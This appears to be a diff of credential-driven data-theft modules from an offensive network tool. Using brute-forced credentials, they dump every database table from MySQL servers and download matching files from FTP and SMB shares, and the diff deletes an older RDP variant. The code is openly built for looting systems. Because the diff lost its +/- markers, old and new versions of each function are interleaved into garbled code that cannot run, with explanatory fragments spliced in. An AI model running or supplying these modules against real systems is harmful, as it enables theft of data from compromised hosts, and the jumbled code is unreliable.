logger.info("StealDataSQL initialized.")
def connect_sql(self, ip, username, password, database=None):
"""
Establish a MySQL connection using SQLAlchemy.
"""
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str, Optional[str]]]:
"""
Return list[(user,password,database)] for SQL service.
Prefer exact IP; also include by MAC if known. Dedup by (u,p,db).
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
d = row.get("database")
d = str(d).strip() if d is not None else None
key = (u, p, d or "")
if not u or (key in seen):
continue
seen.add(key)
out.append((u, p, d))
return out
# -------- SQL helpers --------
def connect_sql(self, ip: str, username: str, password: str, database: Optional[str] = None):
try:
# If no database is specified, connect without one
db_part = f"/{database}" if database else ""
connection_str = f"mysql+pymysql://{username}:{password}@{ip}:3306{db_part}"
engine = create_engine(connection_str, connect_args={"connect_timeout": 10})
conn_str = f"mysql+pymysql://{username}:{password}@{ip}:{b_port}{db_part}"
engine = create_engine(conn_str, connect_args={"connect_timeout": 10})
# quick test
with engine.connect() as _:
pass
self.sql_connected = True
logger.info(f"Connected to {ip} via SQL with username {username}" + (f" to database {database}" if database else ""))
logger.info(f"Connected SQL {ip} as {username}" + (f" db={database}" if database else ""))
return engine
except Exception as e:
logger.error(f"SQL connection error for {ip} with user '{username}' and password '{password}'" + (f" to database {database}" if database else "") + f": {e}")
logger.error(f"SQL connect error {ip} {username}" + (f" db={database}" if database else "") + f": {e}")
return None
def find_tables(self, engine):
"""
Find all tables in all databases, excluding system databases.
Returns list of (table_name, schema_name) excluding system schemas.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Table search interrupted due to orchestrator exit.")
logger.info("Table search interrupted.")
return []
query = """
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
AND TABLE_TYPE = 'BASE TABLE'
"""
df = pd.read_sql(query, engine)
tables = df[['TABLE_NAME', 'TABLE_SCHEMA']].values.tolist()
logger.info(f"Found {len(tables)} tables across all databases")
return tables
q = text("""
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE='BASE TABLE'
AND TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys')
""")
with engine.connect() as conn:
rows = conn.execute(q).fetchall()
return [(r[0], r[1]) for r in rows]
except Exception as e:
logger.error(f"Error finding tables: {e}")
logger.error(f"find_tables error: {e}")
return []
def steal_data(self, engine, table, schema, local_dir):
"""
Download data from the table in the database to a local file.
"""
def steal_data(self, engine, table: str, schema: str, local_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Data stealing process interrupted due to orchestrator exit.")
logger.info("Data steal interrupted.")
return
query = f"SELECT * FROM {schema}.{table}"
df = pd.read_sql(query, engine)
local_file_path = os.path.join(local_dir, f"{schema}_{table}.csv")
df.to_csv(local_file_path, index=False)
logger.success(f"Downloaded data from table {schema}.{table} to {local_file_path}")
q = text(f"SELECT * FROM `{schema}`.`{table}`")
with engine.connect() as conn:
result = conn.execute(q)
headers = result.keys()
os.makedirs(local_dir, exist_ok=True)
out = os.path.join(local_dir, f"{schema}_{table}.csv")
with open(out, "w", newline="", encoding="utf-8") as f:
writer = csv.writer(f)
writer.writerow(headers)
for row in result:
writer.writerow(row)
logger.success(f"Dumped {schema}.{table} -> {out}")
except Exception as e:
logger.error(f"Error downloading data from table {schema}.{table}: {e}")
logger.error(f"Dump error {schema}.{table}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal data from the remote SQL server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''):
self.shared_data.bjornorch_status = "StealDataSQL"
time.sleep(5)
logger.info(f"Stealing data from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
sqlfile = self.shared_data.sqlfile
credentials = []
if os.path.exists(sqlfile):
df = pd.read_csv(sqlfile)
# Filter the credentials for this specific IP
ip_credentials = df[df['IP Address'] == ip]
# Build (username, password, database) tuples
credentials = [(row['User'], row['Password'], row['Database'])
for _, row in ip_credentials.iterrows()]
logger.info(f"Found {len(credentials)} credential combinations for {ip}")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SQL credentials in DB for {ip}")
if not creds:
logger.error(f"No SQL credentials for {ip}. Skipping.")
return 'failed'
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def _timeout():
if not self.sql_connected:
logger.error(f"No SQL connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
def timeout():
if not self.sql_connected:
logger.error(f"No SQL connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
timer = Timer(240, timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
success = False
for username, password, database in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal data execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip} on database {database}")
# First connect without a database to check global permissions
engine = self.connect_sql(ip, username, password)
if engine:
tables = self.find_tables(engine)
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"sql/{mac}_{ip}/{database}")
os.makedirs(local_dir, exist_ok=True)
if tables:
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
break
# Connect to the specific database for the data theft
db_engine = self.connect_sql(ip, username, password, schema)
if db_engine:
self.steal_data(db_engine, table, schema, local_dir)
success = True
counttables = len(tables)
logger.success(f"Successfully stole data from {counttables} tables on {ip}:{port}")
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing data from {ip} with user '{username}' on database {database}: {e}")
for username, password, _db in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
base_engine = self.connect_sql(ip, username, password, database=None)
if not base_engine:
continue
if not success:
logger.error(f"Failed to steal any data from {ip}:{port}")
return 'failed'
else:
tables = self.find_tables(base_engine)
if not tables:
continue
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
db_engine = self.connect_sql(ip, username, password, database=schema)
if not db_engine:
continue
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"sql/{mac}_{ip}/{schema}")
self.steal_data(db_engine, table, schema, local_dir)
logger.success(f"Stole data from {len(tables)} tables on {ip}")
success = True
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"SQL loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
else:
logger.info(f"Skipping {ip} as it was not successfully bruteforced")
return 'skipped'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
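The 4-minute watchdog in `execute()` pairs a `threading.Timer` with a connected flag: if no connection is established before the timer fires, a stop flag aborts the loop. A minimal sketch of that pattern (function and key names hypothetical):

```python
import threading

def run_with_connect_watchdog(connect, timeout_s):
    """Run connect() under a timer that flags failure if no connection in time."""
    state = {"connected": False, "stop": False}

    def _expired():
        # Fires only if connect() has not succeeded yet.
        if not state["connected"]:
            state["stop"] = True

    timer = threading.Timer(timeout_s, _expired)
    timer.start()
    try:
        state["connected"] = bool(connect())
    finally:
        timer.cancel()  # always disarm, as execute() does on success/exit
    return state
```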
def b_parent_action(self, row):
"""
Get the parent action status from the row.
"""
return row.get(b_parent, {}).get(b_status, '')
if __name__ == "__main__":
shared_data = SharedData()
try:
steal_data_sql = StealDataSQL(shared_data)
logger.info("[bold green]Starting SQL data extraction process[/bold green]")
# Load the IPs to process from shared data
ips_to_process = shared_data.read_data()
# Execute data theft on each IP
for row in ips_to_process:
ip = row["IPs"]
steal_data_sql.execute(ip, b_port, row, b_status)
except Exception as e:
logger.error(f"Error in main execution: {e}")


@@ -1,198 +1,272 @@
"""
steal_files_ftp.py - This script connects to FTP servers using provided credentials or anonymous access, searches for specific files, and downloads them to a local directory.
steal_files_ftp.py — FTP file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
- IP -> (MAC, hostname) via DB.hosts.
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
"""
import os
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from ftplib import FTP
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesFTP"
# Action descriptors
b_class = "StealFilesFTP"
b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
b_port = 21
class StealFilesFTP:
"""
Class to handle the process of stealing files from FTP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
logger.info("StealFilesFTP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesFTP initialized")
def connect_ftp(self, ip, username, password):
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
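The identity cache above maps each IP from the semicolon-separated `ips` column to a `(mac, first hostname)` tuple. A pure-function sketch of that parsing (name hypothetical):

```python
def build_ip_identity(host_rows):
    """Map each IP to (mac, first hostname), mirroring _refresh_ip_identity_cache()."""
    ident = {}
    for r in host_rows:
        mac = r.get("mac_address") or ""
        if not mac:
            continue  # hosts without a MAC are skipped
        hostnames = r.get("hostnames") or ""
        first_hn = hostnames.split(';', 1)[0] if hostnames else ""
        for ip in (p.strip() for p in (r.get("ips") or "").split(';')):
            if ip:
                ident[ip] = (mac, first_hn)
    return ident
```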
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Establish an FTP connection.
Return list[(user,password)] from DB.creds for this target.
Prefer exact IP; also include by MAC if known. Dedup preserves order.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
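The dedup step above preserves query order (IP matches before MAC matches) while dropping repeats and empty usernames. Isolated as a standalone helper (name hypothetical):

```python
def dedup_creds(rows):
    """Order-preserving dedup of (user, password) pairs; empty users are dropped."""
    seen, out = set(), []
    for row in rows:
        u = str(row.get("user") or "").strip()
        p = str(row.get("password") or "").strip()
        if not u or (u, p) in seen:
            continue
        seen.add((u, p))
        out.append((u, p))
    return out
```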
# -------- FTP helpers --------
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
# Max recursion depth for directory traversal (avoids symlink loops)
_MAX_DEPTH = 5
def connect_ftp(self, ip: str, username: str, password: str, port: int = b_port) -> Optional[FTP]:
try:
ftp = FTP()
ftp.connect(ip, 21)
ftp.connect(ip, port, timeout=10)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP with username {username}")
logger.info(f"Connected to {ip}:{port} via FTP as {username}")
return ftp
except Exception as e:
logger.error(f"FTP connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.info(f"FTP connect failed {ip}:{port} {username}: {e}")
return None
def find_files(self, ftp, dir_path):
"""
Find files in the FTP share based on the configuration criteria.
"""
files = []
def find_files(self, ftp: FTP, dir_path: str, depth: int = 0) -> List[str]:
files: List[str] = []
if depth > self._MAX_DEPTH:
logger.debug(f"Max recursion depth reached at {dir_path}")
return []
try:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
ftp.cwd(dir_path)
items = ftp.nlst()
for item in items:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
try:
ftp.cwd(item)
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
ftp.cwd(item) # if ok -> directory
files.extend(self.find_files(ftp, os.path.join(dir_path, item), depth + 1))
ftp.cwd('..')
except Exception:
if any(item.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in item for file_name in self.shared_data.steal_file_names):
# not a dir => file candidate
if any(item.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(name in item for name in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, item))
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"Error accessing path {dir_path} on FTP: {e}")
logger.error(f"FTP path error {dir_path}: {e}")
return files
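The loot criterion used in `find_files()` is a simple disjunction: the name ends with a configured extension, or contains a configured substring. As a standalone predicate (name hypothetical):

```python
def matches_loot_criteria(filename, extensions, names):
    """True when filename ends with a target extension or contains a target name."""
    return any(filename.endswith(ext) for ext in (extensions or [])) or \
           any(name in filename for name in (names or []))
```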
def steal_file(self, ftp, remote_file, local_dir):
"""
Download a file from the FTP server to the local directory.
"""
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
# Check file size before downloading
try:
size = ftp.size(remote_file)
if size is not None and size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # SIZE not supported, try download anyway
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
ftp.retrbinary(f'RETR {remote_file}', f.write)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from FTP: {e}")
logger.error(f"FTP download error {remote_file}: {e}")
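`steal_file()` preserves the remote directory layout by rebasing the remote path under the local loot directory with `os.path.relpath`. A POSIX-path sketch of that mapping (helper name hypothetical):

```python
import os

def loot_path(base_dir, remote_file):
    """Mirror the remote directory tree under base_dir, as steal_file() does."""
    # Strip the leading '/' so the remote tree nests inside base_dir.
    return os.path.join(base_dir, os.path.relpath(remote_file, '/'))
```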
def execute(self, ip, port, row, status_key):
"""
Steal files from the FTP server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
timer = None
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesFTP"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
# Get FTP credentials from the cracked passwords file
ftpfile = self.shared_data.ftpfile
credentials = []
if os.path.exists(ftpfile):
with open(ftpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4])) # Username and password
logger.info(f"Found {len(credentials)} credentials for {ip}")
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
def try_anonymous_access():
"""
Try to access the FTP server without credentials.
"""
try:
ftp = self.connect_ftp(ip, 'anonymous', '')
return ftp
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def try_anonymous() -> Optional[FTP]:
return self.connect_ftp(ip, 'anonymous', '', port=port_i)
def timeout():
"""
Timeout function to stop the execution if no FTP connection is established.
"""
if not self.ftp_connected:
logger.error(f"No FTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
if not creds and not try_anonymous():
logger.error(f"No FTP credentials for {ip}. Skipping.")
return 'failed'
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
def _timeout():
if not self.ftp_connected:
logger.error(f"No FTP connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
# Attempt anonymous access first
success = False
ftp = try_anonymous_access()
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/anonymous")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stole {countfiles} files from {ip}:{port} via anonymous access")
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
# Anonymous first
ftp = try_anonymous()
if ftp:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname}
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
if files:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote, local_dir)
logger.success(f"Stole {len(files)} files from {ip} via anonymous")
success = True
try:
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Attempt to steal files using each credential if anonymous access fails
for username, password in credentials:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ftp = self.connect_ftp(ip, username, password)
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/{username}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stole {countfiles} files from {ip}:{port} with user '{username}'")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
except Exception:
pass
if success:
return 'success'
# Authenticated creds
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying FTP {username} @ {ip}:{port_i}")
ftp = self.connect_ftp(ip, username, password, port=port_i)
if not ftp:
continue
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote, local_dir)
logger.info(f"Stole {len(files)} files from {ip} as {username}")
success = True
try:
ftp.quit()
except Exception:
pass
if success:
return 'success'
except Exception as e:
logger.error(f"FTP loot error {ip} {username}: {e}")
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ftp = StealFilesFTP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")
finally:
if timer:
timer.cancel()


@@ -1,184 +0,0 @@
"""
steal_files_rdp.py - This script connects to remote RDP servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import subprocess
import logging
import time
from threading import Timer
from rich.console import Console
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_rdp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesRDP"
b_module = "steal_files_rdp"
b_status = "steal_files_rdp"
b_parent = "RDPBruteforce"
b_port = 3389
class StealFilesRDP:
"""
Class to handle the process of stealing files from RDP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.rdp_connected = False
self.stop_execution = False
logger.info("StealFilesRDP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_rdp(self, ip, username, password):
"""
Establish an RDP connection.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("RDP connection attempt interrupted due to orchestrator exit.")
return None
command = f"xfreerdp /v:{ip} /u:{username} /p:{password} /drive:shared,/mnt/shared"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.info(f"Connected to {ip} via RDP with username {username}")
self.rdp_connected = True
return process
else:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {stderr.decode()}")
return None
except Exception as e:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {e}")
return None
def find_files(self, client, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
# Assuming that files are mounted and can be accessed via SMB or locally
files = []
for root, dirs, filenames in os.walk(dir_path):
for file in filenames:
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(root, file))
logger.info(f"Found {len(files)} matching files in {dir_path}")
return files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
return []
def steal_file(self, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.basename(remote_file))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
command = f"cp {remote_file} {local_file_path}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
else:
logger.error(f"Error downloading file {remote_file}: {stderr.decode()}")
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using RDP.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesRDP"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get RDP credentials from the cracked passwords file
rdpfile = self.shared_data.rdpfile
credentials = []
if os.path.exists(rdpfile):
with open(rdpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no RDP connection is established.
"""
if not self.rdp_connected:
logger.error(f"No RDP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
client = self.connect_rdp(ip, username, password)
if client:
remote_files = self.find_files(client, '/mnt/shared')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"rdp/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stole {countfiles} files from {ip}:{port} using {username}")
client.terminate()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_rdp = StealFilesRDP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")


@@ -1,223 +1,252 @@
"""
steal_files_smb.py — SMB file looter (DB-backed).
SQL mode:
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
- Also try anonymous (''/'').
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
"""
import os
import logging
from rich.console import Console
from threading import Timer
import time
from threading import Timer
from typing import List, Tuple, Dict, Optional
from smb.SMBConnection import SMBConnection
from smb.base import SharedFile
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSMB"
b_class = "StealFilesSMB"
b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
b_port = 445
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$', 'Sharename', '---------', 'SMB1'}
class StealFilesSMB:
"""
Class to handle the process of stealing files from SMB shares.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
logger.info("StealFilesSMB initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
self.IGNORED_SHARES = set(self.shared_data.ignored_smb_shares or [])
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSMB initialized")
def connect_smb(self, ip, username, password):
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
